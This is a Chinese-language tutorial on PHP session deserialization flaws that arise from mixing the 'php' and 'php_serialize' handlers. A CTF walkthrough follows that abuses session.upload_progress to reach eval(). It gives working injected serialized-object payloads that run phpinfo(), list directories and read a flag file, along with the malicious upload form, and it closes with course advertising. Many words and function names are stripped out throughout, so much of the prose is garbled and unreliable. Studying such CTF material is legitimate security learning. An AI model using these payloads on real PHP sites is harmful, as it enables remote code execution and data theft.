反序列化漏洞原理知乎/PHP session反序列化漏洞原理解析_零基础攻防笔记
本质上,就是一种可以维持服务器端的数据存储技术。即**技术就是一种基于后端有别于数据库的临时存储数据的技术**
PHP 工作流程
以PHP为例,理解的原理
PHP脚本使用 ()时开启会话,会自动检测
初始化超全局变量$为一个空数组
PHP通过去指定位置(文件存储位置)匹配对应的文件
程序执行结束,将$中保存的所有数据序列化存储到对应的文件中
具体原理图:
【一>所有资源获取=5.5.4)
经过 () 函数反序列处理的数组
php处理器
首先来看看默认. = php时候的序列化结果,代码如下
<?php
//ini_set('session.serialize_handler','php');
session_start();
$_SESSION['name'] = $_GET['name'];
echo $_SESSION['name'];
?>
为了方便查看,将存储目录设置为. = "/www/",文件如下
1、文件名
文件名为,其中就是后续请求头中携带的的值 (如上图浏览器中已存储)
2、文件内容
php处理器存储格式
键名竖线经过 () 函数反序列处理的值
$['name']的键名:name
s:6:"";
处理器
使用处理器,即. =
<?php
ini_set('session.serialize_handler','php_binary');
session_start();
# 为了方便ACSII显示,将键名设置为36个字符长度
$_SESSION['namenamenamenamenamenamenamenamename'] = $_GET['name'];
echo $_SESSION['namenamenamenamenamenamenamenamename'];
?>
由于三种方式文件名都是一样的,这里只需要查看文件内容
键名的长度对应的 ASCII 字符键名经过 () 函数反序列处理的值.
s:6:"";
处理器
使用处理器,即. =
<?php
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['name'] = $_GET['name'];
echo $_SESSION['name'];
?>
文件内容即经过 () 函数反序列处理的数组,a:1:{s:4:"name";s:6:"";}
的反序列化漏洞利用
的反序列化漏洞,就是利用php处理器和处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因
漏洞成因
首先创建.php,使用处理器来存储数据
<?php
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['session'] = $_GET['session'];
echo $_SESSION['session'];
?>
test.php,使用默认php处理器来存储数据
<?php
session_start();
class f4ke{
public $name;
function __wakeup(){
echo "Who are you?";
}
function __destruct(){
eval($this->name);
}
}
$str = new f4ke();
?>
接着,我们构建URL进行访问.php:
http://www.session-serialize.com/session.php?session=|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}
打开文件可看到序列化存储的内容
a:1:{s:7:"session";s:45:"|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}
漏洞分析:
在.php程序执行,我们将|O:4:"f4ke":1:{s:4:"name";s:10:"();";}通过处理器序列化保存成文件;
由于浏览器中保存的文件名不变,当我们访问test.php,();找到文件并使用php处理器反序列化文件内容,识别格式即
键名竖线经过 () 函数反序列处理的值
a:1:{s:7:"";s:45:"
O:4:"f4ke":1:{s:4:"name";s:10:"();";}
php处理器会以|作为分隔符,将O:4:"f4ke":1:{s:4:"name";s:10:"();";}反序列化,就会触发()方法,最后对象销毁执行()方法中的eval()函数,相当于执行如下:
$_SESSION['session'] = new f4ke();
$_SESSION['session']->name = 'phpinfo();';
我们访问test.php,即可直接执行()函数
CTF例题:
题目地址:http://web.jarvisoj.com:32784/index.php
<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
if(isset($_GET['phpinfo']))
{
$m = new OowoO();
}
else
{
highlight_string(file_get_contents('index.php'));
}
?>
我们可以看到('.', 'php'),判断可能存在反序列化漏洞,根据代码逻辑,访问URL加上参数新建对象触发魔术方法执行()函数,进一步查看.配置
可见php.ini中. = ,当前目录中被设置为. = php,因此存在反序列化利用的条件
补充知识
文件中
local value(局部变量:作用于当前目录程序,会覆盖master value内容):php
master value(主变量:php.ini里面的内容):php_serialize
那么我们如何找到代码入口将利用代码写入到文件?想要写入文件就得想办法在$变量中增加我们可控的输入点
补充知识
上传进度(此特性自 PHP 5.4.0 后可用)
当 INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态
当一个上传在处理中,同时POST一个与INI中设置的..name同名变量时,上传进度可以在[](https://www.php.net//zh/...php)中获得。当PHP检测到这种POST请求时,它会在‘]()中获得。 当PHP检测到这种POST请求时,它会在`S](https://www.php.net//zh/...php)中获得。当PHP检测到这种POST请求时,它会在‘`中添加一组数据, 索引是 与 连接在一起的值。
翻译成人话就是,当检测 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,POST一个与php.ini中设置的..name同名变量,如下图,即可写入$,进一步序列化写入文件
下面是官方给出的一个文件上传时监测进度例子:
action="upload.php" method="POST" enctype="multipart/form-data">
type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" />
type="file" name="file1" />
type="file" name="file2" />
type="submit" />
其中name=""也可以设置为name=""
在中存储的上传进度,如下所示:
<?php
$_SESSION["upload_progress_123"] = array(
"start_time" => 1234567890, // The request time 请求时间
"content_length" => 57343257, // POST content length 长度
"bytes_processed" => 453489, // Amount of bytes received and processed 已接收字节
"done" => false, // true when the POST handler has finished, successfully or not 是否上传完成
"files" => array(//上传的文件
0 => array(
"field_name" => "file1", // Name of the field input中设定的变量名
// The following 3 elements equals those in $_FILES
"name" => "foo.avi", //文件名
"tmp_name" => "/tmp/phpxxxxxx",
"error" => 0,
"done" => true, // True when the POST handler has finished handling this file
"start_time" => 1234567890, // When this file has started to be processed
"bytes_processed" => 57343250, // Amount of bytes received and processed for this file
),
// An other file, not finished uploading, in the same request
1 => array(
"field_name" => "file2",
"name" => "bar.avi",
"tmp_name" => NULL,
"error" => 0,
"done" => false,
"start_time" => 1234567899,
"bytes_processed" => 54554,
),
)
);
其中,中的和name都是我们可控的输入点!
下面我们就开始解题拿到flag
首先,:32784/index.php?查询设置
session.upload_progress.enabled = On --表明允许上传进度跟踪,并填充$ _SESSION变量
session.upload_progress.cleanup = Off --表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量)
即允许上传进度跟踪且结束后不清除数据,更有利使用..name来将利用代码写入文件
构造POST表单提交上传文件
action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
type="file" name="file" />
type="submit" />
构造序列化字符串作为(利用代码)
<?php
class OowoO
{
public $mdzz='print_r(scandir(dirname(__FILE__)));';
}
$obj = new OowoO();
echo serialize($obj);
?>
//O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}
为了防止"被转义,我们在中加入\
随意选择文件,点击表单提交,使用抓包工具抓取请求包
并修改值为
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}
发送请求包,代码执行过程分析:
因此直接执行((()));并返回
查看当前目录,/opt/lampp//
构造最终读取.php文件内容,即flag
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}
网络安全学习路线图(思维导图)
网络安全学习路线图可以是一个有助于你规划学习进程的工具。你可以在思维导图上列出不同的主题和技能,然后按照逻辑顺序逐步学习和掌握它们。这可以帮助你更清晰地了解自己的学习进展和下一步计划。
1. 网络安全视频资料
2. 网络安全笔记/面试题
3. 网安电子书PDF资料
~